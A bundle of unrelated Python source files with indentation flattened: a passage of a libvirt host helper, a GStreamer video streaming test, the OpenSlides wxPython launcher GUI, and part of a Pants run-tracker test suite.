usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
If include_host is True, subtract available host memory from guest 0
to get real used memory within dom0 within xen
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
if CONF.libvirt.virt_type == 'xen':
# For xen, report the sum of all domains, with
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
# TODO(sbauza): Replace that call by a generic _list_devices("pci")
return self.get_connection().listDevices("pci", flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
|
Gtest.py
|
import cv2
import numpy as np
from multiprocessing import Process
def send():
cap_send = cv2.VideoCapture('videotestsrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
out_send = cv2.VideoWriter('appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=8888',cv2.CAP_GSTREAMER,0, 20, (320,240), True)
if not cap_send.isOpened() or not out_send.isOpened():
print('VideoCapture or VideoWriter not opened')
exit(0)
print('Start sending.')
while True:
ret,frame = cap_send.read()
if not ret:
print('empty frame')
break
out_send.write(frame)
# cv2.imshow('send', frame)
# if cv2.waitKey(1)&0xFF == ord('q'):
# break
cap_send.release()
out_send.release()
def receive():
cap_receive = cv2.VideoCapture('udpsrc port=8888 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
if not cap_receive.isOpened():
print('VideoCapture not opened')
exit(0)
print('Start receiving.')
while True:
ret,frame = cap_receive.read()
if not ret:
print('empty frame')
break
# cv2.imshow('receive', frame)
print('test')
# if cv2.waitKey(1)&0xFF == ord('q'):
# break
#cap_receive.release()
if __name__ == '__main__':
s = Process(target=send)
r = Process(target=receive)
s.start()
r.start()
s.join()
r.join()
cv2.destroyAllWindows()
|
gui.py
|
import datetime
import errno
import gettext
import itertools
import json
import locale
import os
import queue
import signal
import subprocess
import sys
import threading
import wx
import wx.adv
import openslides
from openslides.utils.main import (
detect_openslides_type,
get_default_user_data_dir,
PortableDirNotWritable,
)
_translations = gettext.NullTranslations()
_ = lambda text: _translations.gettext(text)
ngettext = lambda msg1, msg2, n: _translations.ngettext(msg1, msg2, n)
def get_data_path(*args):
return os.path.join(os.path.dirname(__file__), "data", *args)
class RunCmdEvent(wx.PyCommandEvent):
def __init__(self, evt_type, evt_id):
super(RunCmdEvent, self).__init__(evt_type, evt_id)
self.running = False
self.exitcode = None
EVT_RUN_CMD_ID = wx.NewEventType()
EVT_RUN_CMD = wx.PyEventBinder(EVT_RUN_CMD_ID, 1)
class RunCommandControl(wx.Panel):
UPDATE_INTERVAL = 500
def __init__(self, parent):
super(RunCommandControl, self).__init__(parent)
self.child_process = None
self.output_queue = queue.Queue()
self.output_read_thread = None
self.output_mutex = threading.RLock()
vbox = wx.BoxSizer(wx.VERTICAL)
self.te_output = wx.TextCtrl(
self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL)
vbox.Add(self.te_output, 1, wx.EXPAND)
self.update_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_update_timer, self.update_timer)
self.SetSizerAndFit(vbox)
def _read_output(self):
while True:
# NOTE: don't use iterator interface since it uses an
# internal buffer and we don't see output in a timely fashion
line = self.child_process.stdout.readline()
if not line:
break
self.output_queue.put(line)
def is_alive(self):
if self.child_process is None:
return False
return self.child_process.poll() is None
def run_command(self, *args):
if self.is_alive():
raise ValueError("already running a command")
cmd = [sys.executable, "-u", "-m", "openslides"]
cmd.extend(args)
creationflags = getattr(subprocess, "CREATE_NEW_PROCESS_GROUP", 0)
self.child_process = subprocess.Popen(
cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, creationflags=creationflags)
self.child_process.stdin.close()
self.output_read_thread = threading.Thread(target=self._read_output)
self.output_read_thread.start()
self.update_timer.Start(self.UPDATE_INTERVAL)
evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
evt.running = True
self.GetEventHandler().ProcessEvent(evt)
def cancel_command(self):
if not self.is_alive():
return
self.te_output.AppendText(_("Stopping server..."))
# kill the main process (without killing browser)
os.kill(self.child_process.pid, signal.SIGINT)
def on_update_timer(self, evt):
is_alive = self.is_alive()
if not is_alive:
# join thread to make sure everything was read
self.output_read_thread.join(5)
if self.output_read_thread.is_alive():
self.te_output.AppendText(
"Internal error: failed to join output reader thread")
self.output_read_thread = None
for line_no in itertools.count():
try:
data = self.output_queue.get(block=False)
except queue.Empty:
break
else:
# XXX: check whether django uses utf-8 or locale for
# it's cli output
text = data.decode("utf-8", errors="replace")
with self.output_mutex:
self.te_output.AppendText(text)
# avoid waiting too long here if child is still alive
if is_alive and line_no > 10:
break
if not is_alive:
exitcode = self.child_process.returncode
self.update_timer.Stop()
self.child_process = None
evt = RunCmdEvent(EVT_RUN_CMD_ID, self.GetId())
evt.running = False
evt.exitcode = exitcode
self.GetEventHandler().ProcessEvent(evt)
def append_message(self, text, newline="\n"):
with self.output_mutex:
self.te_output.AppendText(text + newline)
class SettingsDialog(wx.Dialog):
def __init__(self, parent):
super(SettingsDialog, self).__init__(parent, wx.ID_ANY, _("Settings"))
grid = wx.GridBagSizer(5, 5)
row = 0
lb_host = wx.StaticText(self, label=_("&Host:"))
grid.Add(lb_host, pos=(row, 0))
self.tc_host = wx.TextCtrl(self)
grid.Add(self.tc_host, pos=(row, 1), flag=wx.EXPAND)
row += 1
lb_port = wx.StaticText(self, label=_("&Port:"))
grid.Add(lb_port, pos=(row, 0))
self.tc_port = wx.TextCtrl(self)
grid.Add(self.tc_port, pos=(row, 1), flag=wx.EXPAND)
row += 1
self.cb_use_geiss = wx.CheckBox(
self, label=_("&Use Geiss and Redis (experimental, 64bit only)"))
self.cb_use_geiss.SetValue(False)
grid.Add(self.cb_use_geiss, pos=(row, 0), span=(1, 3))
row += 1
sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
if not sizer is None:
grid.Add(0, 0, pos=(row, 0), span=(1, 2))
row += 1
grid.Add(sizer, pos=(row, 0), span=(1, 2))
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=5, proportion=1)
self.SetSizerAndFit(box)
@property
def host(self):
return self.tc_host.GetValue()
@host.setter
def host(self, host):
self.tc_host.SetValue(host)
@property
def port(self):
return self.tc_port.GetValue()
@port.setter
def port(self, port):
self.tc_port.SetValue(port)
@property
def use_geiss(self):
return self.cb_use_geiss.GetValue()
@use_geiss.setter
def use_geiss(self, use_geiss):
self.cb_use_geiss.SetValue(use_geiss)
class BackupSettingsDialog(wx.Dialog):
# NOTE: keep order in sync with _update_interval_choices()
_INTERVAL_UNITS = ["second", "minute", "hour"]
def __init__(self, parent):
super(BackupSettingsDialog, self).__init__(
parent, wx.ID_ANY, _("Database backup"))
self._interval_units = {}
grid = wx.GridBagSizer(5, 5)
row = 0
self.cb_backup = wx.CheckBox(
self, label=_("&Regularly backup database"))
self.cb_backup.SetValue(True)
self.cb_backup.Bind(wx.EVT_CHECKBOX, self.on_backup_checked)
grid.Add(self.cb_backup, pos=(row, 0), span=(1, 3))
row += 1
lb_dest = wx.StaticText(self, label=_("&Destination:"))
grid.Add(lb_dest, pos=(row, 0))
style = wx.FLP_SAVE | wx.FLP_USE_TEXTCTRL
self.fp_dest = wx.FilePickerCtrl(self, style=style)
grid.Add(self.fp_dest, pos=(row, 1), span=(1, 2), flag=wx.EXPAND)
row += 1
lb_interval = wx.StaticText(self, label=_("&Every"))
grid.Add(lb_interval, pos=(row, 0))
self.sb_interval = wx.SpinCtrl(self, min=1, initial=1)
self.sb_interval.Bind(wx.EVT_SPINCTRL, self.on_interval_changed)
grid.Add(self.sb_interval, pos=(row, 1))
self.ch_interval_unit = wx.Choice(self)
grid.Add(self.ch_interval_unit, pos=(row, 2))
row += 1
grid.AddGrowableCol(1)
sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
if not sizer is None:
grid.Add(0, 0, pos=(row, 0), span=(1, 3))
row += 1
grid.Add(sizer, pos=(row, 0), span=(1, 3))
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=5, proportion=1)
self.SetSizerAndFit(box)
self._update_interval_choices()
self._update_backup_enabled()
@property
def backupdb_enabled(self):
return self.cb_backup.GetValue()
@backupdb_enabled.setter
def backupdb_enabled(self, enabled):
self.cb_backup.SetValue(enabled)
self._update_backup_enabled()
@property
def backupdb_destination(self):
return self.fp_dest.GetPath()
@backupdb_destination.setter
def backupdb_destination(self, path):
self.fp_dest.SetPath(path)
@property
def interval(self):
return self.sb_interval.GetValue()
@interval.setter
def interval(self, value):
self.sb_interval.SetValue(value)
self._update_interval_choices()
@property
def interval_unit(self):
return self._INTERVAL_UNITS[self.ch_interval_unit.GetSelection()]
@interval_unit.setter
def interval_unit(self, unit):
try:
idx = self._INTERVAL_UNITS.index(unit)
except IndexError:
raise ValueError("Unknown unit {0}".format(unit))
self.ch_interval_unit.SetSelection(idx)
def _update_interval_choices(self):
count = self.sb_interval.GetValue()
choices = [
ngettext("second", "seconds", count),
ngettext("minute", "minutes", count),
ngettext("hour", "hours", count),
]
current = self.ch_interval_unit.GetSelection()
if current == wx.NOT_FOUND:
current = 2 # default to hour
self.ch_interval_unit.Clear()
self.ch_interval_unit.AppendItems(choices)
self.ch_interval_unit.SetSelection(current)
def _update_backup_enabled(self):
checked = self.cb_backup.IsChecked()
self.fp_dest.Enable(checked)
self.sb_interval.Enable(checked)
self.ch_interval_unit.Enable(checked)
def on_backup_checked(self, evt):
self._update_backup_enabled()
def on_interval_changed(self, evt):
self._update_interval_choices()
# TODO: validate settings on close (e.g. non-empty path if backup is
# enabled)
class MainWindow(wx.Frame):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent, title="OpenSlides")
icons = wx.IconBundle(
get_data_path("openslides.ico"),
wx.BITMAP_TYPE_ICO)
self.SetIcons(icons)
self.server_running = False
self.gui_settings_path = None
self.gui_initialized = False
self.backupdb_enabled = False
self.backupdb_destination = ""
self.backupdb_interval = 15
self.backupdb_interval_unit = "minute"
self.last_backup = None
self.backup_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_backup_timer, self.backup_timer)
spacing = 5
panel = wx.Panel(self)
grid = wx.GridBagSizer(spacing, spacing)
# logo & about button
logo_box = wx.BoxSizer(wx.HORIZONTAL)
grid.Add(logo_box, pos=(0, 0), flag=wx.EXPAND)
row = 0
fp = get_data_path("openslides-logo_wide.png")
with open(fp, "rb") as f:
logo_wide_bmp = wx.Image(f).ConvertToBitmap()
logo_wide = wx.StaticBitmap(panel, wx.ID_ANY, logo_wide_bmp)
logo_box.AddSpacer(2 * spacing)
logo_box.Add(logo_wide)
logo_box.AddStretchSpacer()
version_str = _("Version {0}").format(openslides.__version__)
lb_version = wx.StaticText(panel, label=version_str)
font = lb_version.GetFont()
font.SetPointSize(8)
lb_version.SetFont(font)
logo_box.Add(lb_version, flag=wx.ALIGN_CENTER_VERTICAL)
self.bt_about = wx.Button(panel, label=_("&About..."))
self.bt_about.Bind(wx.EVT_BUTTON, self.on_about_clicked)
grid.Add(self.bt_about, pos=(row, 1), flag=wx.ALIGN_CENTER_VERTICAL)
row += 1
grid.Add(0, spacing, pos=(row, 0), span=(1, 2))
row += 1
# server settings
server_settings = wx.StaticBox(panel, wx.ID_ANY, _("Server Settings"))
server_box = wx.StaticBoxSizer(server_settings, wx.VERTICAL)
grid.Add(server_box, pos=(row, 0), flag=wx.EXPAND)
self._host = None
self._port = None
self.use_geiss = False
hbox = wx.BoxSizer(wx.HORIZONTAL)
server_box.Add(hbox, flag=wx.EXPAND)
self.lb_host = wx.StaticText(panel)
hbox.Add(self.lb_host, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.lb_port = wx.StaticText(panel)
hbox.Add(self.lb_port, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.bt_settings = wx.Button(panel, label=_("S&ettings..."))
self.bt_settings.Bind(wx.EVT_BUTTON, self.on_settings_clicked)
hbox.Add(self.bt_settings)
server_box.AddSpacer(spacing)
self.cb_start_browser = wx.CheckBox(
panel, label=_("Automatically open &browser"))
self.cb_start_browser.SetValue(True)
server_box.Add(self.cb_start_browser)
server_box.AddStretchSpacer()
server_box.AddSpacer(spacing)
self.bt_server = wx.Button(panel, label=_("&Start server"))
self.bt_server.Bind(wx.EVT_BUTTON, self.on_start_server_clicked)
server_box.Add(self.bt_server, flag=wx.EXPAND)
self.host = "0.0.0.0"
self.port = "8000"
# "action" buttons
action_vbox = wx.BoxSizer(wx.VERTICAL)
action_vbox.AddSpacer(3 * spacing)
grid.Add(action_vbox, pos=(row, 1))
self.bt_backup = wx.Button(panel, label=_("&Backup database..."))
self.bt_backup.Bind(wx.EVT_BUTTON, self.on_backup_clicked)
action_vbox.Add(self.bt_backup)
action_vbox.AddSpacer(spacing)
self.bt_sync_db = wx.Button(panel, label=_("S&ync database"))
self.bt_sync_db.Bind(wx.EVT_BUTTON, self.on_syncdb_clicked)
action_vbox.Add(self.bt_sync_db)
action_vbox.AddSpacer(spacing)
self.bt_reset_admin = wx.Button(panel, label=_("&Reset admin"))
self.bt_reset_admin.Bind(wx.EVT_BUTTON, self.on_reset_admin_clicked)
action_vbox.Add(self.bt_reset_admin)
row += 1
# command output
self.cmd_run_ctrl = RunCommandControl(panel)
self.cmd_run_ctrl.Bind(EVT_RUN_CMD, self.on_run_cmd_changed)
grid.Add(
self.cmd_run_ctrl,
pos=(row, 0), span=(1, 2),
flag=wx.EXPAND)
grid.AddGrowableCol(0)
grid.AddGrowableRow(3)
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=spacing, proportion=1)
panel.SetSizerAndFit(box)
self.Fit()
self.SetMinSize(self.ClientToWindowSize(box.GetMinSize()))
self.SetInitialSize(wx.Size(500, 400))
self.Bind(wx.EVT_CLOSE, self.on_close)
def initialize_gui(self):
if self.gui_initialized:
return True
# Set path for gui settings to default user data according to the
# OpenSlides type. This does not depend on any argument the user might
# type in.
openslides_type = detect_openslides_type()
try:
default_user_data_path = get_default_user_data_dir(openslides_type)
except PortableDirNotWritable:
wx.MessageBox(
_("The portable directory is not writable. Please copy the "
"openslides portable to a writeable location and start it "
"again from there"),
_("Error: Portable directory not writable"),
wx.OK | wx.ICON_ERROR)
return False
self.gui_settings_path = os.path.join(
default_user_data_path, 'openslides', 'gui_settings.json')
self.load_gui_settings()
self.apply_backup_settings()
self.gui_initialized = True
return True
@property
def backup_interval_seconds(self):
if self.backupdb_interval_unit == "second":
factor = 1
elif self.backupdb_interval_unit == "minute":
factor = 60
elif self.backupdb_interval_unit == "hour":
factor = 3600
return self.backupdb_interval * factor
@property
def host(self):
return self._host
@host.setter
def host(self, host):
self._host = host
self.lb_host.SetLabel(_("Host: {0}").format(host))
@property
def port(self):
return self._port
@port.setter
def port(self, port):
self._port = port
self.lb_port.SetLabel(_("Port: {0}").format(port))
def load_gui_settings(self):
if self.gui_settings_path is None:
return
try:
f = open(self.gui_settings_path, "r", encoding="utf-8")
except IOError as e:
if e.errno == errno.ENOENT:
return
raise
with f:
settings = json.load(f)
def setattr_unless_none(attr, value):
if not value is None:
setattr(self, attr, value)
backup_settings = settings.get("database_backup", {})
setattr_unless_none("backupdb_enabled", backup_settings.get("enabled"))
setattr_unless_none(
"backupdb_destination", backup_settings.get("destination"))
setattr_unless_none(
"backupdb_interval", backup_settings.get("interval"))
setattr_unless_none(
"backupdb_interval_unit", backup_settings.get("interval_unit"))
last_backup = backup_settings.get("last_backup")
if not last_backup is None:
self.last_backup = datetime.datetime.strptime(
last_backup, "%Y-%m-%d %H:%M:%S")
server_settings = settings.get("server_settings", {})
setattr_unless_none("host", server_settings.get("host"))
setattr_unless_none("port", server_settings.get("port"))
setattr_unless_none("use_geiss", server_settings.get("use_geiss"))
def save_gui_settings(self):
if self.last_backup is None:
last_backup = None
else:
last_backup = self.last_backup.strftime("%Y-%m-%d %H:%M:%S")
settings = {
"database_backup": {
"enabled": self.backupdb_enabled,
"destination": self.backupdb_destination,
"internal": self.backupdb_interval,
"interval_unit": self.backupdb_interval_unit,
"last_backup": last_backup
},
"server_settings": {
"host": self.host,
"port": self.port,
"use_geiss": self.use_geiss,
},
}
dp = os.path.dirname(self.gui_settings_path)
if not os.path.exists(dp):
os.makedirs(dp)
with open(self.gui_settings_path, "w", encoding="utf-8") as f:
json.dump(settings, f, ensure_ascii=False, indent=4)
def apply_backup_settings(self):
if self.backupdb_enabled and self.server_running:
now = datetime.datetime.utcnow()
delta = datetime.timedelta(seconds=self.backup_interval_seconds)
ref = self.last_backup
if ref is None:
ref = now
ref += delta
d = ref - now
seconds = d.days * 86400 + d.seconds
if seconds < 1:
seconds = 30 # avoid backup immediatly after start
self.backup_timer.Start(seconds * 1000, True)
else:
self.backup_timer.Stop()
def do_backup(self):
cmd = [
sys.executable, "-u", "-m", "openslides", "backupdb",
self.backupdb_destination,
]
p = subprocess.Popen(
cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
p.stdin.close()
output = p.stdout.read().strip()
exitcode = p.wait()
if output:
self.cmd_run_ctrl.append_message(output)
time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if exitcode == 0:
self.cmd_run_ctrl.append_message(
_("{0}: Database backup successful.").format(time))
else:
self.cmd_run_ctrl.append_message(
_("{0}: Database backup failed!").format(time))
self.last_backup = datetime.datetime.utcnow()
def on_syncdb_clicked(self, evt):
self.cmd_run_ctrl.append_message(_("Syncing database..."))
self.cmd_run_ctrl.run_command("migrate")
def on_reset_admin_clicked(self, evt):
self.cmd_run_ctrl.append_message(_("Resetting admin user..."))
self.cmd_run_ctrl.run_command("createsuperuser")
def on_about_clicked(self, evt):
info = wx.adv.AboutDialogInfo()
info.SetName("OpenSlides")
info.SetVersion(openslides.__version__)
info.SetDescription(_(
"OpenSlides is a free web based presentation and "
"assembly system.\n"
"OpenSlides is free software; licensed under the MIT license."
).replace(u" ", u"\u00a0"))
info.SetCopyright(_(u"\u00a9 2011-2018 by OpenSlides team"))
info.SetWebSite("https://www.openslides.org/", "www.openslides.org")
# XXX: at least on wxgtk this has no effect
info.SetIcon(self.GetIcon())
wx.adv.AboutBox(info)
def on_start_server_clicked(self, evt):
if self.server_running:
self.cmd_run_ctrl.cancel_command()
return
args = ["--host", self._host, "--port", self._port]
if not self.cb_start_browser.GetValue():
args.append("--no-browser")
if self.use_geiss:
args.append("--use-geiss")
# run redis-server
self.cmd_run_ctrl.append_message(_("Starting redis server..."))
redis_command = os.path.join('bin', 'redis-server')
subprocess.Popen([redis_command])
self.server_running = True
self.cmd_run_ctrl.run_command("start", *args)
# initiate backup_timer if backup is enabled
self.apply_backup_settings()
self.bt_server.SetLabel(_("&Stop server"))
def on_settings_clicked(self, evt):
dlg = SettingsDialog(self)
dlg.host = self._host
dlg.port = self._port
dlg.use_geiss = self.use_geiss
if dlg.ShowModal() == wx.ID_OK:
self.host = dlg.host
self.port = dlg.port
self.use_geiss = dlg.use_geiss
def on_backup_clicked(self, evt):
dlg = BackupSettingsDialog(self)
dlg.backupdb_enabled = self.backupdb_enabled
dlg.backupdb_destination = self.backupdb_destination
dlg.interval = self.backupdb_interval
dlg.interval_unit = self.backupdb_interval_unit
if dlg.ShowModal() == wx.ID_OK:
self.backupdb_enabled = dlg.backupdb_enabled
self.backupdb_destination = dlg.backupdb_destination
self.backupdb_interval = dlg.interval
self.backupdb_interval_unit = dlg.interval_unit
self.apply_backup_settings()
def on_run_cmd_changed(self, evt):
show_completion_msg = not evt.running
if self.server_running and not evt.running:
self.bt_server.SetLabel(_("&Start server"))
self.server_running = False
self.backup_timer.Stop()
if self.backupdb_enabled:
self.do_backup()
# no operation completed msg when stopping server
show_completion_msg = False
self.bt_settings.Enable(not evt.running)
self.bt_backup.Enable(not evt.running)
self.bt_sync_db.Enable(not evt.running)
self.bt_reset_admin.Enable(not evt.running)
self.bt_server.Enable(self.server_running or not evt.running)
if show_completion_msg:
if evt.exitcode == 0:
text = _("Operation successfully completed.")
else:
text = _("Operation failed (exit code = {0})").format(
evt.exitcode)
self.cmd_run_ctrl.append_message(text)
def on_backup_timer(self, evt):
if not self.backupdb_enabled:
return
self.do_backup()
self.backup_timer.Start(1000 * self.backup_interval_seconds, True)
def on_close(self, ev):
self.cmd_run_ctrl.cancel_command()
self.save_gui_settings()
self.Destroy()
class OpenslidesApp(wx.App):
def __init__(self):
super(OpenslidesApp, self).__init__(False)
def OnInit(self):
window = MainWindow()
self.SetTopWindow(window)
if not window.initialize_gui():
self.Exit()
return False
window.Show()
return True
def main():
app = OpenslidesApp()
wx.Locale(wx.LANGUAGE_DEFAULT)
lang = locale.getdefaultlocale()[0]
if lang:
global _translations
localedir = get_data_path("locale")
_translations = gettext.translation(
"openslides_gui", localedir, [lang], fallback=True)
app.MainLoop()
if __name__ == "__main__":
main()
|
test_run_tracker.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import http.server
import json
import threading
from urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.util.contextutil import temporary_file_path
from pants_test.test_base import TestBase
class RunTrackerTest(TestBase):
def test_upload_stats(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
length = int(handler.headers['Content-Length'])
post_data = parse_qs(handler.rfile.read(length).decode())
decoded_post_data = {k: json.loads(v[0]) for k, v in post_data.items()}
self.assertEqual(stats, decoded_post_data)
handler.send_response(200)
handler.end_headers()
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return 'http://{}:{}{}'.format(host, port, path)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats))
server.shutdown()
server.server_close()
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
RunTracker.write_stats_to_json(file_name, stats)
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
